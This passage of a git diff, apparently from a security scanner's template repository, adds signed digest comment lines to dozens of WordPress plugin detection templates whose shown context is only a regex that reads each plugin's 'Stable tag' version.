4a0a0047304502206cd4ae1548ca5aeeacf3e753bbee01a03dcaacda576ed74880b3dafd4edb1476022100842510ab65e025f2c3b44a5e1521fecd1b8e715948366975b6b91ec139c288bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..63251d60ed 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca929d5d8bac9dd261040a4e1f4fbaf734fbd092a31fe23d36f5eacdae135423022016f6094d211dc2a7d4940b84866bb9ed9cdd9c270e555f8b61e5e3b45a7aeeb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..f1b86fc2cd 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097be8004f4d52fc79d9459487cb23d243724964e07fe2a793b64407489c542c5022100917aefdc038a5081b087f86142caf157dcc8c643141e30c30ddd21db88601796:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..b3775fdd13 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aaf42f8c84af132465b691ed4dbd4608723a054a7dde9d328f84ea57ac2db64c02207f97aae6270326e6bd5470c0f7cf6a18c923e20bf85a36a9d18a9ceec3139e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..c74c537b8a 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5bda7b4aad872df7412d999f5932bd830f5f43fd9bc5ef41c56832e9f27fce6022100be838ada6e2d2561f8270adbbc081885c9c79565933473364416680f9f368380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..dfd4e9cc02 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5e6ce410aaf6c4759028351784d457b92b099a0e40a33bdc832b04a6a6d8702022028edd09f612a2b81a67695d5fbd62f2c0508e87fa9382fb64706016d025e485c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..006ca5b80e 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2386b96e76833e789f4022758c81dca47244641542169f78935a71fd9f9eefd0220230a97f0b24d84bdcbacc28a74e739689fc332fb7a1f80b59f4416ac38a0999e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..c676d658be 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1bf64faf3ed6e5c8b5d40949a457c80c1a856d9858dea625dcceb3d9942557802206d1903da36f7fe3f4f9603f0f4fee4b2147b473bef3abffc738188af12f92a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..3c710f3b6f 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcfd4433b7760f3f6942d142d0cef1c634343c23ecf483e82ce2efcaecd385a10220009c96e362cae90995742cd9814193e290fe0d09b8641bdd4eb5191cb7d6bb55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..b3a19ca44b 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e80e0d95f79dfbc096796aec32e766bfe563890241364fb210b658901d3d94202204a8359e8f2550798f32bdbe17edc25a3e2a92d0b6b7a5bc2b8169d642379fa61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..b4d3ada11a 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013c6399fecdb4a153eaf9f1255e4025819342bffa296f077ced1e367329ed139022100e6716adfd46e82ab0665d899a9a39f6ac4195cc57eca9eafc2a7b0074c4a8d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..6e12a22ed3 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201dcc2b4f17b64a9ff3caeccc262a096e8bd0936000ec0c86e5e9d2fd59ed998d022100f6a94c6aded17b21d6132db7b1d7243fc367a93ed9c5e0d2fdf3704ff3c7c404:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..1a6d99fc3c 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a4fbb1239ec460f6bf29ea13d935cd8d8e072875ebd56e1fb79fd1dc1206f1102210082a3395a34cc51ca14b5eeb35a4b3a2cd83bc512769bfaab764e926c967ff31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..c2adb291d0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205433bc96607a9a8d5007f7434932fc90dac0337e7a3e7b25f55c9f0238cc827c0220123a3305577cdc9eee6b2df3b1eaa88a7b1b266cc5f916ac5968a24ba3b92f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..c064cec8af 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ff857d0a0e74a2c95c6ae7408be51c5f0e9b422103eae325790846f672cacde022100f91171f7446fcb7c0dc5ee2f68b184121652200ef5e0bad4d8da843b59b9b6dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..7e75aa09de 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd98dc06860039bb59f35ee67a72ef96e3976fac07f6888fb0b406bbf3fbca2c022100cee59e0cded4f7bd27e1d3bd82f1f8cfa9f64be684a6fd3c87ed3608707461d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..73a0083c41 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e9e7fa77e18e96eb7021a6eb93173a21b25ca3a1bf9c6aa78ba7c040bb10050b022100d2af3024c4062a66c4ad15996e742aaf842be8159d5051c15fee790836b86102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..4f752ae4e7 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1f07cfb9dd54771db79f50ec5230b1d20ec7cdbd05f8593fc56a79b5cd7497b02204483b09c1bbedb0262a35ffc02846365059c018c17227deb09bcba65edec4a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..64bf67af82 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f3506dadf9e82da105b54df71f7dd213aaf1bb9202f2e12a4429b5b0d8a4f37f02202da812cb4dbbb4f1dec98d008c59269b6fa9b8df35ff62cfbcf32e5b62a42dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..cfba9cdbdd 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a884027907b37e5a8994d67a7b6e62a9d853da27b33580a476f6230bb3196f65022100da3632631b4f51f4e7bdc4a011b840e4093942024c298f4faffdcbab5760de55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..8eb2cdce51 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009cbdada64eceef62ef38e6d09efbfc49d4a34e135d59d381781247f8790c98b4022100e8d177b07ca753cb30e56f71a83df1230dd98a9a570d7a58e0fa71c536e80738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..dccb2c75e9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a946cb35f227b0aec9b906da6422b7624cceb7b6ad54ae8262464bfed6be0d2002210085ac96b4d657f960cf06944c0aaf863e8e25efc9f58dfe89b26640d870841a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..ea6bc17422 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b8e7e834e60795560e3cb90e822d07707a969c392cf061d4f570d7760964bb9022044c1eab9ea8bc665359dc0af75e70bbd86901d1fc2f507ef30cf2ab89abd3c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..b56da5c75d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ed416714e86069d8ae0ef1fe189d53e077c8bf94bf512fc7f7677e7eb5b28b7e0221008caafcb150ef1f903ad79e0cb92c9d12a9bbcbaceb96066ade51913db78644b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..3bc6c2fffa 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a309202b2fad75e205b0ec7ca3836303653e11fb3e14f522277d6bdfe28e0ee1022100859e52a8a16e59558025d1c1c8b28c1640e46041dd0a85cc95c21548d20b3235:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..1f5f1de8a5 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0f31b58849b19e4a2637869402ae33609bb150efd381f1529c2f201827a0a13022100a71013fc8c270e2e55837d30cc0d7493b5dc25084b7c67dde5c88ec349580da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..0df2904fa6 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7a3bbf417736967a8eba7e6f2da5413b5d4a79fb0609f312e0714c6531069e5022100f3058482038e50e57413c0664fe858e2dfc8358fe70c024d55d766abfa7f775b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..27351a1ea1 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ac9a2c5c2d850ce8f29973df9c714c86465c0c0849137715c0482739bbabe330220454db5f6b643eb322a1f7e03f67b8d17b95154815165490cc463107ced89e694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..3205cb465c 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210083139d8103ea4fe77ff0d8c40403eea6d9b3bccb8e2c49962dd8676a4621d5c902201cac14d242c686c2eb13aff9f0d39dacd8012006b8a0c2f3f724b3336d885de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..c9af4aab76 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017ec9f2ecf58809152a4b3410a70ee5d48711f4ea7e838f269a60f3f1889123e022100d2a6137fc3de61189744e6b4c6eb3ea4571ec411bc3b2f940b0ceb3a86bb1a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..44f03891ce 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220599a3a1719d83564d8461afe00b644fc22190255293a1a838c06d6bd95ae2152022100b3ae58f51fd0b97a5abcedb292dc433b144973530e8ae370213adb5974115737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..16b4d700a6 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100daffb475fde845c9bf887372fa0285982ac993d063152b129eac51d8529e8848022100bc773b3088a024517db31febfa7244c8475e7430f7bd8c5bd2bbacbd1ab72790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..61caa3ee98 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099ee2d14db80ec9e368bc7cafc8020c05167dfeffbd13db23d38681bedc01549022100b171e0c197f1fe5ca062a8598cf42b37e24599b7810388ead919a957cc82716b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..b5506021e0 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cdad706f5cc384fc7dd30fdd4eae40882d83fff2c98f7c81803581f7b6f609ce02207bca9c6c076171e3a69770352821ab0bbc298b13b72dfee88407aa0f31642b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..b2e01038a5 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202c307e8a83542f2cf933b411c9ced332eef7b15830a25d576b599f36c63bb74a022019114a04511fda5bcc0d964eb850224baea0dc882ba0031813e8bb7faf7a8b38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..f9cd9e74f0 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220156d4abf897da578113846059caad7fdd4b22d10cc60043ff8b34744138f13d8022019f819201a58cc151e6ce3c644462597d8376ac5c496a2d2f6cb0458a4928c4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..ded448fc8a 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220191cd3b1b87438d434ac76f460a5c6a0bc3c0d44af219ca5d0dce6e695a37568022100ddba82c1dd71e328c7d0a980817270ff555e3c74d03bc8fbcc0fbdc4c0f7bfe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..599b0ea93e 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9fda39b66a5d42bf70dd05128977d482df64361a6f773643c7dedef1eb3b067022100d8856588676e8cbd9569036aeaf6fd8d284d16ad3068b24ff0424e8c419a8866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..cc484eaa76 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004451d19ba231ce5a3c9a151ae92890ab7e25347882c13584157f2b94928bf20022100a346144c3626ee241f254a27b3b5def85b2268619de2b3693e49aba8ebb00489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..08222d378d 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202129ddc12b7d4422f64ddd72d8d485a00dccb0e00c1814fda322cade53108c2d022019aa046f425078e33804bf3da6bbb57e5fda726913b0db00ea52f5b3d61fee35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..4d5c09bcf2 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf0251b47f96ae9167f614733b78f95c9eb213dc8c6411117acbe3052a94946802202f78521d43799eb8e69fe7d04f0f3b6427d45a651a2feeba0f53c6071a3490ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..9972b39966 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b84f2a221277932e173e5d2cb7772e08491aa97ec015f8379d1ad05abbd7e5fd022001f2fcfdab3dbcbfc773c7950f41388fbd94c8c679a47043ec21d84230f211df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..8bb8d2507a 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100992873f118c431bf0b37b83c916c3678944318c75c0668433aa976ef2f8c913002204b3c51339f613b75a6f73cf68f8609167c54d90b7d74aeb90b608de59f4d5250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..e1073cd859 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ff543ac94c22aeb1f869f2249b9ac7627f63251a36e53964c7cfdd88c3b888e022100a84d443ae2721cdc8e9d90d0f56426cc4ae45bf57c29af3e5b1a47975e537215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..617165e5df 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b9f87a617ca07acc59d8af50d6201de92f445b935feb42e98f8bfc4c504fa840022100ae04a38d072dbb03a696fd6ebac157690d1f103bb0c1c8a1149245ab2da737be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..e72728fc10 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c81d486837c3b20b625f17ea7ae657bf43f2533c9e315317330ed3834563bbf0220042b96a888139d26b96d33e12bb8689803c1a37c6125a22c70dcd7ae55e102e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..5cd27015f7 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202187391e0c586acc2de53482383c73c131db5fb9fcd2860cbd8bf8af122ce780022100ac03fde69e37241a15391f6db32d8fe2de5fe73c9df7580384eac01c19006ad3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..c1e008f9f6 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ 